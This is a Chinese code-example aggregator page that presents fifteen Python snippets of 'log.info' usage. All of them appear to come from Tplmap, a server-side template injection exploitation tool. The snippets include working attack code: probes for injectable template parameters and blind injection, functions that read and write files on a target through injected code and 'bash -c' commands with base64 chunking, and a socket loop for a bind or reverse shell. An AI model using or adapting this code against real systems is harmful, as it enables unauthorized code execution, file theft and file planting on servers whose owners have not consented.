本文整理汇总了Python中utils.loggers.log.info函数的典型用法代码示例。如果您正苦于以下问题:Python info函数的具体用法?Python info怎么用?Python info使用的例子?那么恭喜您, 这里精选的函数代码示例或许可以为您提供帮助。
在下文中一共展示了info函数的15个代码示例,这些例子默认根据受欢迎程度排序。您可以为喜欢或者感觉有用的代码点赞,您的评价将有助于系统推荐出更棒的Python代码示例。
示例1: read
def read(self, remote_path):
action = self.actions.get('read', {})
payload = action.get('read')
call_name = action.get('call', 'render')
# Skip if something is missing or call function is not set
if not action or not payload or not call_name or not hasattr(self, call_name):
return
# Get remote file md5
md5_remote = self.md5(remote_path)
if not md5_remote:
log.warn('Error getting remote file md5, check presence and permission')
return
execution_code = payload % ({ 'path' : remote_path })
data_b64encoded = getattr(self, call_name)(
code = execution_code,
)
data = base64.b64decode(data_b64encoded)
if not md5(data) == md5_remote:
log.warn('Remote file md5 mismatch, check manually')
else:
log.info('File downloaded correctly')
return data示例2: forward_data
def forward_data(self):
log.info("Incoming connection accepted")
self.socket.setblocking(0)
while(1):
read_ready, write_ready, in_error = select.select(
[self.socket, sys.stdin], [], [self.socket, sys.stdin])
try:
buffer = self.socket.recv(100)
while(buffer != ''):
self.socket_state = True
sys.stdout.write(buffer)
sys.stdout.flush()
buffer = self.socket.recv(100)
if(buffer == ''):
return
except socket.error:
pass
while(1):
r, w, e = select.select([sys.stdin], [], [], 0)
if(len(r) == 0):
break
c = sys.stdin.read(1)
if(c == ''):
return
if(self.socket.sendall(c) != None):
return示例3: _print_injection_summary
def _print_injection_summary(channel):
prefix = channel.data.get('prefix', '').replace('\n', '\\n')
render_tag = channel.data.get('render_tag').replace('\n', '\\n') % ({'payload' : '' })
suffix = channel.data.get('suffix', '').replace('\n', '\\n')
log.info("""Tplmap identified the following injection point:
Engine: %(engine)s
Template: %(prefix)s%(render_tag)s%(suffix)s
Context: %(context)s
OS: %(os)s
Capabilities:
Code evaluation: %(eval)s
OS command execution: %(exec)s
File write: %(write)s
File read: %(read)s
""" % ({
'prefix': prefix,
'render_tag': render_tag,
'suffix': suffix,
'context': 'text' if (not prefix and not suffix) else 'code',
'engine': channel.data.get('engine').capitalize(),
'os': channel.data.get('os', 'undetected'),
'eval': 'no' if not channel.data.get('eval') else 'yes, %s code' % (channel.data.get('eval')),
'exec': 'no' if not channel.data.get('exec') else 'yes',
'write': 'no' if not channel.data.get('write') else 'yes',
'read': 'no' if not channel.data.get('read') else 'yes',
})) 示例4: _detect_dust
def _detect_dust(self):
# Print what it's going to be tested
log.info('%s plugin is testing rendering' % (
self.plugin,
)
)
for prefix, suffix in self._generate_contexts():
payload = 'AA{!c!}AA'
header_rand = rand.randint_n(10)
header = str(header_rand)
trailer_rand = rand.randint_n(10)
trailer = str(trailer_rand)
if 'AAAA' == self.render(
code = payload,
header = header,
trailer = trailer,
header_rand = header_rand,
trailer_rand = trailer_rand,
prefix = prefix,
suffix = suffix
):
self.set('header', '%s')
self.set('trailer', '%s')
self.set('prefix', prefix)
self.set('suffix', suffix)
self.set('engine', self.plugin.lower())
self.set('language', self.language)
return示例5: detect_template_injection
def detect_template_injection(channel, plugins = plugins):
# Loop manually the channel.injs modifying channel's inj_idx
for i in xrange(len(channel.injs)):
log.info("Testing if %s parameter '%s' is injectable" % (
channel.injs[channel.inj_idx]['field'],
channel.injs[channel.inj_idx]['param']
)
)
current_plugin = None
# Iterate all the available plugins until
# the first template engine is detected.
for plugin in plugins:
current_plugin = plugin(channel)
# Skip if user specify a specific --engine
if channel.args.get('engine') and channel.args.get('engine').lower() != current_plugin.plugin.lower():
continue
current_plugin.detect()
if channel.data.get('engine'):
return current_plugin
channel.inj_idx += 1示例6: _print_injection_summary
def _print_injection_summary(channel):
prefix = channel.data.get('prefix', '').replace('\n', '\\n')
render = channel.data.get('render', '%(code)s').replace('\n', '\\n') % ({'code' : '*' })
suffix = channel.data.get('suffix', '').replace('\n', '\\n')
if channel.data.get('evaluate_blind'):
evaluation = 'ok, %s code (blind)' % (channel.data.get('language'))
elif channel.data.get('evaluate'):
evaluation = 'ok, %s code' % (channel.data.get('language'))
else:
evaluation = 'no'
if channel.data.get('execute_blind'):
execution = 'ok (blind)'
elif channel.data.get('execute'):
execution = 'ok'
else:
execution = 'no'
if channel.data.get('write'):
if channel.data.get('blind'):
writing = 'ok (blind)'
else:
writing = 'ok'
else:
writing = 'no'
log.info("""Tplmap identified the following injection point:
%(method)s parameter: %(parameter)s
Engine: %(engine)s
Injection: %(prefix)s%(render)s%(suffix)s
Context: %(context)s
OS: %(os)s
Technique: %(injtype)s
Capabilities:
Shell command execution: %(execute)s
Bind and reverse shell: %(bind_shell)s
File write: %(write)s
File read: %(read)s
Code evaluation: %(evaluate)s
""" % ({
'prefix': prefix,
'render': render,
'suffix': suffix,
'context': 'text' if (not prefix and not suffix) else 'code',
'engine': channel.data.get('engine').capitalize(),
'os': channel.data.get('os', 'undetected'),
'injtype' : 'blind' if channel.data.get('blind') else 'render',
'evaluate': evaluation,
'execute': execution,
'write': writing,
'read': 'no' if not channel.data.get('read') else 'ok',
'bind_shell': 'no' if not channel.data.get('bind_shell') else 'ok',
'method': channel.injs[channel.inj_idx]['field'],
'parameter': channel.injs[channel.inj_idx]['param']
}))示例7: _parse_get
def _parse_get(self):
params_dict_list = urlparse.parse_qs(urlparse.urlsplit(self.url).query)
for param, value_list in params_dict_list.items():
self.get_params[param] = value_list
if any(x for x in value_list if '*' in x):
self.get_placeholders.append(param)
log.info('Found placeholder in GET parameter \'%s\'' % param)示例8: _print_injection_summary
def _print_injection_summary(channel):
prefix = channel.data.get('prefix', '').replace('\n', '\\n')
render = channel.data.get('render', '%(code)s').replace('\n', '\\n') % ({'code' : '*' })
suffix = channel.data.get('suffix', '').replace('\n', '\\n')
idiom = channel.data.get('evaluate')
if idiom:
evaluation = 'yes, %s code' % (idiom)
if channel.data.get('evaluate_blind'):
evaluation += ' (blind)'
else:
evaluation = 'no'
# Handle execute_blind first since even if it's blind, execute is set as well
# TODO: fix this? less ambiguity
if channel.data.get('execute_blind'):
execution = 'yes (blind)'
elif channel.data.get('execute'):
execution = 'yes'
else:
execution = 'no'
log.info("""Tplmap identified the following injection point:
Engine: %(engine)s
Injection: %(prefix)s%(render)s%(suffix)s
Context: %(context)s
OS: %(os)s
Technique: %(injtype)s
Capabilities:
Code evaluation: %(evaluate)s
OS command execution: %(execute)s
File write: %(write)s
File read: %(read)s
""" % ({
'prefix': prefix,
'render': render,
'suffix': suffix,
'context': 'text' if (not prefix and not suffix) else 'code',
'engine': channel.data.get('engine').capitalize(),
'os': channel.data.get('os', 'undetected'),
'injtype' : 'blind' if channel.data.get('blind') else 'render',
'evaluate': evaluation,
'execute': execution,
'write': 'no' if not channel.data.get('write') else 'yes',
'read': 'no' if not channel.data.get('read') else 'yes',
}))示例9: read
def read(self, remote_path):
# Get remote file md5
md5_remote = self._md5(remote_path)
if not md5_remote:
log.warn('Error getting remote file md5, check presence and permission')
return
data_b64encoded = self.evaluate("""print(base64_encode(file_get_contents("%s")));""" % remote_path)
data = base64decode(data_b64encoded)
if not md5(data) == md5_remote:
log.warn('Remote file md5 mismatch, check manually')
else:
log.info('File downloaded correctly')
return data示例10: read
def read(self, remote_path):
# Get remote file md5
md5_remote = self._md5(remote_path)
if not md5_remote:
log.warn('Error getting remote file md5, check presence and permission')
return
data_b64encoded = self.evaluate("""__import__("base64").b64encode(open("%s", "rb").read())""" % remote_path)
data = base64decode(data_b64encoded)
if not md5(data) == md5_remote:
log.warn('Remote file md5 mismatch, check manually')
else:
log.info('File downloaded correctly')
return data示例11: _detect_blind
def _detect_blind(self):
action = self.actions.get('blind', {})
payload_true = action.get('test_bool_true')
payload_false = action.get('test_bool_false')
call_name = action.get('call', 'inject')
# Skip if something is missing or call function is not set
if not action or not payload_true or not payload_false or not call_name or not hasattr(self, call_name):
return
# Print what it's going to be tested
log.info('%s plugin is testing blind injection' % (
self.plugin
)
)
for prefix, suffix in self._generate_contexts():
# Conduct a true-false test
if not getattr(self, call_name)(
code = payload_true,
prefix = prefix,
suffix = suffix,
blind = True
):
continue
detail = {'blind_true':self._inject_verbose}
if getattr(self, call_name)(
code = payload_false,
prefix = prefix,
suffix = suffix,
blind = True
):
continue
detail['blind_false'] = self._inject_verbose
detail['average'] = sum(self.render_req_tm)/len(self.render_req_tm)
# We can assume here blind is true
self.set('blind', True)
self.set('prefix', prefix)
self.set('suffix', suffix)
self.channel.detected('blind', detail)
return示例12: _detect_render
def _detect_render(self):
render_action = self.actions.get('render')
if not render_action:
return
# Print what it's going to be tested
log.info('%s plugin is testing rendering with tag %s' % (
self.plugin,
repr(render_action.get('render') % ({'code' : '*' })),
)
)
for prefix, suffix in self._generate_contexts():
# Prepare base operation to be evalued server-side
randA = rand.randint_n(1)
randB = rand.randint_n(1)
expected = str(randA*randB)
payload = render_action.get('render') % ({ 'code': '%s*%s' % (randA, randB) })
header_rand = rand.randint_n(10)
header = render_action.get('header') % ({ 'header' : header_rand })
trailer_rand = rand.randint_n(10)
trailer = render_action.get('trailer') % ({ 'trailer' : trailer_rand })
# First probe with payload wrapped by header and trailer, no suffex or prefix
if expected == self.render(
code = payload,
header = header,
trailer = trailer,
header_rand = header_rand,
trailer_rand = trailer_rand,
prefix = prefix,
suffix = suffix
):
self.set('render', render_action.get('render'))
self.set('header', render_action.get('header'))
self.set('trailer', render_action.get('trailer'))
self.set('prefix', prefix)
self.set('suffix', suffix)
return示例13: write
def write(self, data, remote_path):
# Check existance and overwrite with --force-overwrite
if self._md5(remote_path):
if not self.channel.args.get('force_overwrite'):
log.warn('Remote path already exists, use --force-overwrite for overwrite')
return
else:
self.evaluate("""open("%s", 'w').close()""" % remote_path)
# Upload file in chunks of 500 characters
for chunk in chunkit(data, 500):
chunk_b64 = base64.urlsafe_b64encode(chunk)
self.evaluate("""open("%s", 'ab+').write(__import__("base64").urlsafe_b64decode('%s'))""" % (remote_path, chunk_b64))
if not md5(data) == self._md5(remote_path):
log.warn('Remote file md5 mismatch, check manually')
else:
log.info('File uploaded correctly')示例14: write
def write(self, data, remote_path):
# Check existance and overwrite with --force-overwrite
if self._md5(remote_path):
if not self.channel.args.get('force_overwrite'):
log.warn('Remote path already exists, use --force-overwrite for overwrite')
return
else:
self.execute("bash -c {echo,-n,}>%s" % (remote_path))
# Upload file in chunks of 500 characters
for chunk in chunkit(data, 500):
chunk_b64 = base64encode(chunk)
self.execute("bash -c {base64,--decode}<<<%s>>%s" % (chunk_b64, remote_path))
if not md5(data) == self._md5(remote_path):
log.warn('Remote file md5 mismatch, check manually')
else:
log.info('File uploaded correctly')示例15: read
def read(self, remote_path):
# Get remote file md5
md5_remote = self._md5(remote_path)
if not md5_remote:
log.warn('Error getting remote file md5, check presence and permission')
return
# Using base64 since self.execute() calling self.inject() strips
# the response, corrupting the data
data_b64encoded = self.execute('bash -c base64<%s' % remote_path)
data = base64decode(data_b64encoded)
if not md5(data) == md5_remote:
log.warn('Remote file md5 mismatch, check manually')
else:
log.info('File downloaded correctly')
return data